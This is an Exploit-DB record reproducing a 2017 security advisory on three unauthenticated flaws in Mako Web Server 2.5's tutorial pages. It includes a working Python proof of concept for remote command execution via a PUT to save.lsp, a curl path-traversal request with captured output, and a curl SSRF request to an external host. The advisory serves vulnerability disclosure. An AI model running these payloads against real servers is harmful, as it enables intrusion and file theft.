Mako Web Server 2.5 - Multiple Vulnerabilities

2017-09-13T00:00:00

Description

{"id": "EDB-ID:42683", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "Mako Web Server 2.5 - Multiple Vulnerabilities", "description": "", "published": "2017-09-13T00:00:00", "modified": "2017-09-13T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/42683", "reporter": "hyp3rlinx", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2022-08-16T08:16:42", "viewCount": 12, "enchantments": {"score": {"value": 0.2, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.2}, "_state": {"dependencies": 1661190352, "score": 1661184847}, "_internal": {"score_hash": "c60332b57a5f273a3b163fb3f2933135"}, "sourceHref": "https://www.exploit-db.com/download/42683", "sourceData": "[+] SSD Beyond Security: https://blogs.securiteam.com/index.php/archives/3391\r\n[+] Credits: John Page a.k.a hyp3rlinx\t\r\n[+] Website: hyp3rlinx.altervista.org\r\n[+] Source: http://hyp3rlinx.altervista.org/advisories/MAKO-WEB-SERVER-MULTIPLE-UNAUTHENTICATED-VULNERABILIITIES-SECURITEAM.txt\r\n[+] ISR: ApparitionSec \r\n\r\n\r\nVulnerabilities Summary\r\nThe following advisory describe three (3) vulnerabilities found in Mako Server\u2019s tutorial page.\r\n\r\nThe vulnerabilities found are:\r\n\r\nUnauthenticated Arbitrary File Write vulnerability that leads to Remote Command Execution\r\nUnauthenticated File Disclosure\r\nUnauthenticated Server Side Request Forgery\r\nAs these tutorial may be used as the basis for production code, it is important for users to be aware of these issues.\r\n\r\n\u201cAs a compact application and web server, the Mako Server helps developers rapidly design secure IoT and web applications. The Mako Server provides\r\nan application server environment from which developers can design and implement complete, custom solutions. The Mako Web Server is ideal for embedded Linux systems.\u201d\r\n\r\nCredit\r\nAn independent security researcher, John Page AKA hyp3rlinx, has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program\r\n\r\nVendor response\r\n\r\nRealTimeLogic was informed of the vulnerability on Aug 13, but while acknowledging the receipt of the vulnerability information, refused to respond to the\r\ntechnical claims, to give a fix timeline or coordinate an advisory, saying:\r\n\r\n\u201cI just sent a formal notification for the commercial license requirement and also we need to put a maintenance contract in place.\r\nInternally I need to set-up a cost allocation account for billing against these support inquiries.\u201d\r\n\r\nAt this time it\u2019s unclear whether these vulnerabilities are going to be fixed and further attempts to get a status clarification failed.\r\n\r\n\r\nVulnerabilities details\r\n\r\nUnauthenticated Arbitrary File Write vulnerability that leads to Remote Command Execution:\r\n\r\nMako web-server tutorial does not sufficiently sanitizing the HTTP PUT requests, when an attacker send HTTP PUT request to \u2018save.lsp\u2018 web page, the input passed\r\nto a function responsible for accessing the filesystem.\r\n\r\nThe attacker input will be saved on the victims machine and can be execute by sending HTTP GET request to \u2018manage.lsp\u2018\r\n\r\n\r\nHTTP PUT 'http://VICTIM-IP/examples/save.lsp?ex=2.1'\r\nHTTP GET 'http://VICTIM-IP/examples/manage.lsp?execute=true&ex=2.1&type=lua'\r\n\r\n\r\nProof of Concept\r\n\r\n\r\nimport urllib2,time\r\n\r\n#MakoServer v2.5 Remote Command Execution 0day\r\n#Credits: John Page AKA hyp3rlinx\r\n#=========================================\r\n\r\nprint 'MakoServer v2.5 Remote Command Execution'\r\n\r\nCMD=\"os.execute('c:/Windows/system32/calc.exe')\"\r\n\r\nopener = urllib2.build_opener(urllib2.HTTPHandler)\r\nrequest = urllib2.Request('http://IP/examples/save.lsp?ex=2.1', data=CMD)\r\nrequest.add_header('Content-Type', 'text/plain;charset=UTF-8')\r\nrequest.add_header('X-Requested-With', 'XMLHttpRequest')\r\nrequest.add_header('Referer', 'http://localhost/Lua-Types.lsp')\r\nrequest.get_method = lambda: 'PUT'\r\nopener.open(request)\r\n\r\ntime.sleep(1)\r\n\r\nurllib2.urlopen('http://IP/examples/manage.lsp?execute=true&ex=2.1&type=lua')\r\n\r\n\r\n\r\nUnauthenticated File Disclosure\r\n\r\nMako web-server tutorial is not sufficiently sanitizing GET requests, when an attacker send GET request to the URI IP/fs/../.., the input passed\r\nwithout modification and the response with the file content is returned.\r\n\r\nProof of Concept\r\nThe following GET request will response with the C/Windows/system.ini content:\r\n\r\ncurl -v http://VICTIM-IP/fs/C/Windows/system.ini\r\n\r\n* About to connect() to VICTIM-IP port 80\r\n* Trying VICTIM-IP... connected\r\n* Connected to VICTIM-IP (VICTIM-IP) port 80\r\n> GET /fs/C/Windows/system.ini HTTP/1.1\r\n> User-Agent: curl/7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5\r\n> Host: VICTIM-IP\r\n> Accept: */*\r\n>\r\n< HTTP/1.1 200 OK\r\n< Date: Mon, 07 Aug 2017 22:21:27 GMT\r\n< Server: MakoServer.net\r\n< Content-Type: application/octet-stream\r\n< Accept-Ranges: bytes\r\n< Etag: 58b4be20\r\n< Last-Modified: Tue, 28 Feb 2017 00:02:40 GMT\r\n< Content-Length: 219\r\n< Keep-Alive: Keep-Alive\r\n; for 16-bit app support\r\n[386Enh]\r\nwoafont=dosapp.fon\r\nEGA80WOA.FON=EGA80WOA.FON\r\nEGA40WOA.FON=EGA40WOA.FON\r\nCGA80WOA.FON=CGA80WOA.FON\r\nCGA40WOA.FON=CGA40WOA.FON\r\n\r\n[drivers]\r\nwave=mmdrv.dll\r\ntimer=timer.drv\r\n\r\n[mci]\r\n\r\n\r\nServer Side Request Forgery\r\n\r\nMako web-server tutorial is not sufficiently sanitizing incoming POST requests, when an attacker sends an POST request to the \u2018rtl/appmgr/new-application.lsp\u2018\r\nURI, the input will be executed and the server will connect to the attacker\u2019s machine.\r\n\r\nProof of Concept\r\nStart Wireshark to see successful connections made from Mako Web Server victim machine.\r\n\r\nInitiate requests from another machine using CURL:\r\n\r\ncurl -v -X POST http://VICTIM-IP/rtl/appmgr/new-application.lsp -d io=net -d path=http://EXTERNAL-IP\r\n\r\n\r\n\r\nNetwork Access:\r\n===============\r\nRemote\r\n\r\n\r\n\r\nSeverity:\r\n=========\r\nHigh\r\n\r\n\r\n\r\nDisclosure Timeline:\r\n====================\r\nWould like to acknowledge Beyond Security\u2019s SSD program for the help with co-ordination of this vulnerability.\r\nMore details can be found on their blog at:\r\n\r\nhttps://blogs.securiteam.com/index.php/archives/3391\r\n\r\n\r\n\r\n[+] Disclaimer\r\nThe information contained within this advisory is supplied \"as-is\" with no warranties or guarantees of fitness of use or otherwise.\r\nPermission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and\r\nthat due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit\r\nis given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility\r\nfor any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information\r\nor exploits by the author or elsewhere. All content (c).\r\n\r\nhyp3rlinx", "osvdbidlist": [], "exploitType": "remote", "verified": true}